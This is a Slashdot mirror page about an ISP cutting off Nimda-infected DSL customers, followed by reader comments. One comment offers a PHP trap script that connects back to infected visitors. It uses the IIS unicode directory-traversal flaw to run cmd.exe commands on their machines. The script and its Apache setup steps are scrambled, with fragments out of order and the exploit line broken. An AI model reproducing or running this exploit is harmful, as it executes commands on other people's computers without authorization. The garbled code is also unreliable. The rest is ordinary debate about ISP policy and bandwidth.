Slashdot Mirror
Shutting Down Worm-Infected Broadband Users
disc-chord writes "Frustrated by Code Red and now Nimda, the DSL provider DSL.net (a CLEC and reseller of Covad) has shut off 800+ infected customers. They claim they cannot get in touch with all of their customers, so they're just shutting them all down, and waiting for the customer to call them. When/if the customer does call they are informed that they are infected with the Nimda virus and must remove it before they will be reactivated. But how are customers supposed to fix the problem when their internet connection is shut down? " I say tough beans: If you get infected, it's your responsibility to get yourself cleaned up. The Internet is a peer-to-peer system where one peer can piss in the public pool. These ISPs are doing a good thing by keeping this crap off the net. Sure, a nicer tactic would be to disable low port numbers for infected users (my provider doesn't let them through in the first place) but this would likely just confuse users. At least this way they know what's up. Flame if you will, but all these worms are going to only get worse since Microsoft will never fix the problem without making sure people have to pay a monthly subscription for their OS, and users are unaware that they have to patch their boxes. ISPs shouldn't have to be responsible for their users this way, but they are responsible for keeping their other users online, and a few infected boxes can cause a lot of havoc for the whole net.
I made a PHP script, by modifying a similar one used for Code Red. First make a "scripts" directory in your web server's root directory. Now put this into a file called "root.exe"
/* Check to see if the connection actually opened */
/* URL-encode the message... */
/* ...and send it */
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/syst em32/cmd.exe?/c+$string HTTP/1.0\n\n");
/* close the connection (though it probably got closed automatically) */
/usr/local/apache/httpd.conf, whatever it is) and put this type in like this:
.php .php3 .exe
/tmp/nimba.log.
<?php
/* Open a connection to the offender */
$fp = fsockopen($REMOTE_ADDR, 80, $en, $es, 5);
if ($fp)
{
$string = urlencode("net send %COMPUTERNAME% WARNING: The NIMDA worm has been detected on your computer. Please shut down the IIS web server that is currently running and keep it disabled until you can patch and/or re-install your system, or better yet, upgrade to Linux or FreeBSD. Visit http://www.kb.cert.org/vuls/id/111677 for more information.");
fputs ($fp, "GET
fclose ($fp);
}
/* for fun and confusion.. */
header ("HTTP/1.0 404");
echo ("<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n");
echo ("<html><head>\n<title>404 Not Found</title>\n</head></body>\n" );
echo ("<h1>Not Found</h1>\n");
echo ("The requested URL $SCRIPT_NAME was not found on this server.\n");
echo ("</body></html>\n");
echo ("<address>Apache/1.3.20 Server at $SERVER_NAME Port $SERVER_PORT</address>\n");
echo ("</body></html>\n");
$res = "dirty\r\n";
$log = fopen("/tmp/nimda.log", "a");
fwrite($log, $REMOTE_ADDR . " " . date("D, d M Y H:i:s T") . " - " . $res);
fclose($log);
?>
Then, (after making sure users can access the file.. try going to http://machine/scripts/root.exe. It's going to print out the contents of that file. You want to change that, right?
Well here's how you change that. Edit your httpd.conf file (/etc/httpd.conf,
AddType application/x-httpd-php
Now restart Apache by issuing one of either:
/etc/rc.d/init.d/httpd restart
apachectl restart
That should do it, and you're going to have a logfile of all the people who have been warned in
Consider the daffodil. And while you're doing that, I'll be over here, looking through your stuff.
I don't believe that is the reason why the provider shutdown their customers. I believe the reason is that they have very specific expectations of bandwidth usage. And they use these expectations to create a nice little equation: for X broadband users we need to have f(X) available bandwidth from our service provider, where f(X) is significantly lower than sum(all user's subscription rates). So while they guarantee you 7x24 access (at whatever rate you paid for) they're only expecting you to be a user 1-2 hours a day, maybe 3-4 days a week. The virii turn your computer bandwidth usage into 7x24 at your subscribed rate. And this really screws up their equation. This is one of the reasons that several broadband providers don't allow you to have servers on your network. The usage patterns of your web server or email server are too unpredictable, and consequently they have to set a policy that forbids them.
If they don't know about, or stop the virii, they end up with bad trending data. The trending data is what they used to determine whether or not f(X) was reasonable. When the trending data changes, so does f(X), and they have to spend more money believing that they need more bandwidth. Failure to do this results in customers switching to another provider. This is *especially* true of DSL customers for whom other providers are nearly guaranteed to exist (since DSL has open access). So, when a provider know that the trending data is bad, they have one of two choices:
I guess I find myself agreeing with Taco, but only to a limited extent. The providers have to make at least some consession to the users who need to be able to download patches. It's easy for us in the *nix world to raise our noses at this. But don't forget that the very first Internet denial of service worm exploited sendmail. We're not immune. We're just not popular. And when the day comes that we are popular, I would like to think that there is a way for me to get the code that will resolve a problem that I didn't know I had.
Key to financial independence: Spend less than you earn. Save and invest the difference. Do it for a long time.